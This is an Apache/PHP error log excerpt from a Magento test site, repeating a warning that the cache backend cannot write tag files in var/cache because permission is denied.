[Fri Sep 08 09:19:52.380933 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.380960 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.847151 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:52.847188 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.361726 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.361760 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.381233 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.381259 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.385549 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.385591 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.389461 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.389483 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.393886 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.393908 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.397959 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.397981 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.401504 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.401526 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.405462 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.405489 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.409429 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.409452 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.413735 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.413758 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.418500 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.418523 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.422455 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.422482 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.426494 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.426515 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.430218 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.430240 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.434175 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.434198 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.438194 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.438219 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.442091 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.442119 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.445637 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.445662 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.449589 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.449611 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.453190 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.453211 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.456751 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.456771 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.460779 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.460804 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.466664 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.466689 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.471128 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.471151 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.475278 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:19:53.475300 2023] [php:warn] [pid 1736062] [client 151.62.151.174:58872] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.033404 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.033444 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.042188 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.042230 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.435564 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.435602 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.464552 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.464581 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.537468 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.537498 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.548895 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.548922 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.985336 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:10.985369 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.005784 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.005825 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.015387 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.015423 2023] [php:warn] [pid 1736059] [client 151.62.151.174:58871] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.073908 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.073955 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.094269 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.094296 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.095607 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.095644 2023] [php:warn] [pid 1735845] [client 151.62.151.174:58888] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_MAGE): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
[Fri Sep 08 09:20:11.330625 2023] [php:warn] [pid 1735442] [client 151.62.151.174:58868] PHP Warning: file_put_contents(/var/www/magento.test.indacotrentino.com/www/var/cache//mage-tags/mage---20a_CONFIG): Failed to open stream: Permission denied in /var/www/magento.test.indacotrentino.com/www/vendor/colinmollenhour/cache-backend-file/File.php on line 707, referer: https://economiasolidale.38121.it/
